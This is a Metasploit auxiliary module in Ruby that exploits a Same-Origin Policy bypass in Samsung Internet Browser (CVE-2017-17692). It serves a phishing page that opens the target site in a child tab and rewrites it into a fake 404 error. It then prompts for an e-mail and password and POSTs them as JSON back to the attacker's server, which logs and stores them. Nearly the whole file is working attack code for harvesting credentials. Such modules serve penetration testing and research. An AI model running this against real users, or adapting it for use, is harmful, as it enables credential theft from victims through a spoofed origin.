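##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Serves a phishing page that abuses the Samsung Internet Browser SOP bypass
# (CVE-2017-17692). A click on the page opens TARGET_URL in a child tab; script
# running in the opener then rewrites that tab's document and prompts for an
# e-mail/password, which the child tab POSTs back to this server as JSON. The
# harvested pair is logged and stored as a credential against TARGET_URL.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samsung Internet Browser SOP Bypass',
        'Description' => %q(
          This module takes advantage of a Same-Origin Policy (SOP) bypass
          vulnerability in the Samsung Internet Browser, a popular mobile
          browser shipping with Samsung Android devices. By default, it
          initiates a redirect to a child tab, and rewrites the innerHTML to
          gather credentials via a fake pop-up.
        ),
        'License' => MSF_LICENSE,
        'Author' => [
          'Dhiraj Mishra',  # Original discovery, disclosure
          'Tod Beardsley',  # Metasploit module
          'Jeffrey Martin'  # Metasploit module
        ],
        'References' => [
          ['CVE', '2017-17692'],
          ['URL', 'http://fr.0day.today/exploit/description/28434']
        ],
        'DisclosureDate' => 'Nov 08 2017',
        'Actions' => [['WebServer']],
        'PassiveActions' => ['WebServer'],
        'DefaultAction' => 'WebServer'
      )
    )

    register_options([
      OptString.new('TARGET_URL', [
        true,
        'The URL to spoof origin from.',
        'http://example.com/'
      ]),
      OptString.new('CUSTOM_HTML', [
        true,
        'HTML to display to the victim.',
        'This page has moved. Please <a href="https://www.exploit-db.com/exploits/43376/#">click here</a> to redirect your browser.'
      ])
    ])

    register_advanced_options([
      OptString.new('CUSTOM_JS', [
        false,
        "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
        ''
      ])
    ])
  end

  # Auxiliary entry point: just starts the HTTP server from the mixin.
  def run
    exploit # start http server
  end

  # JavaScript injected into go() after the child tab has been opened as `x`.
  # Returns the operator's CUSTOM_JS verbatim when set. The default payload
  # waits 3s for the child tab to load, replaces its body with a fake 404,
  # prompts for e-mail and password from inside the spoofed-origin tab, and
  # POSTs them as JSON back to this server (window.location of the opener).
  def evil_javascript
    custom = datastore['CUSTOM_JS']
    return custom unless custom.blank?

    <<-EOS
      setTimeout(function(){
        x.document.body.innerHTML='<h1>404 Error</h1>'+
          '<p>Oops, something went wrong.</p>';
        a=x.prompt('E-mail','');
        b=x.prompt('Password','');
        var cred=JSON.stringify({'user':a,'pass':b});
        var xmlhttp = new XMLHttpRequest;
        xmlhttp.open('POST', window.location, true);
        xmlhttp.send(cred);
      }, 3000);
    EOS
  end

  # Build the landing page once, before the server starts.
  #
  # TARGET_URL is emitted as a JSON string literal so a quote or backslash in
  # the option cannot break out of the JavaScript string (the previous
  # single-quoted interpolation would have produced a syntax error and a dead
  # payload). CUSTOM_HTML is operator-supplied markup and is inserted verbatim
  # by design. NOTE(review): this override does not call super; confirm the
  # mixin's own setup needs nothing here.
  def setup
    target_js = datastore['TARGET_URL'].to_s.to_json
    @html = <<-EOS
<html>
<meta charset="UTF-8">
<head>
<script>
function go(){
  try {
    var x = window.open(#{target_js});
    #{evil_javascript}
  } catch(e) { }
}
</script>
</head>
<body onclick="go()">
#{datastore['CUSTOM_HTML']}
</body></html>
    EOS
  end

  # Record a harvested credential in the database. TARGET_URL is used as the
  # realm so the credential can be tied back to the site that was spoofed.
  def store_cred(username, password)
    create_credential(
      origin_type: :import,
      module_fullname: fullname,
      filename: 'msfconsole',
      workspace_id: myworkspace_id,
      service_name: 'web_service',
      realm_value: datastore['TARGET_URL'],
      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
      private_type: :password,
      private_data: password,
      username: username
    )
  end

  # Parse the POST body as a JSON object. Returns an empty Hash for malformed
  # JSON or a non-object top-level value so the caller falls through to raw
  # logging instead of raising on attacker-reachable input.
  def parse_cred(body)
    parsed = JSON.parse(body)
    parsed.is_a?(Hash) ? parsed : {}
  rescue JSON::ParserError
    {}
  end

  # Handle the POST the injected script sends back. The default payload posts
  # {"user":..., "pass":...}; anything else (operator CUSTOM_JS using another
  # schema, malformed JSON, a non-object) is logged raw and not stored.
  #
  # `cli` is the connection from on_request_uri and is used only for the peer
  # address in log lines. It is optional so existing single-argument callers
  # keep working; the previous body referenced cli.peerhost without cli being
  # in scope, which raises NameError unless the mixin happens to supply it.
  def collect_data(request, cli = nil)
    peer = cli ? cli.peerhost : 'unknown'
    body = request.body.to_s
    cred = parse_cred(body)
    user = cred['user']
    pass = cred['pass']

    if user.blank? || pass.blank?
      print_good("#{peer}: POST data received from #{datastore['TARGET_URL']}: #{body}")
    else
      print_good("#{peer}: Collected credential for '#{datastore['TARGET_URL']}' #{user}:#{pass}")
      store_cred(user.to_s, pass.to_s)
    end
  end

  # HTTP handler. GET serves the landing page; POST is the credential callback
  # from the injected script. The POST is answered with an empty body so the
  # victim's XHR completes rather than waiting on an unanswered request.
  def on_request_uri(cli, request)
    peer = cli.peerhost
    case request.method.downcase
    when 'get'
      # initial connection
      print_status("#{peer}: Request '#{request.method} #{request.uri}'")
      print_status("#{peer}: Attempting to spoof origin for #{datastore['TARGET_URL']}")
      send_response(cli, @html)
    when 'post'
      # must have fallen for it
      collect_data(request, cli)
      send_response(cli, '')
    else
      print_error("#{peer}: Unhandled method: #{request.method}")
    end
  end
end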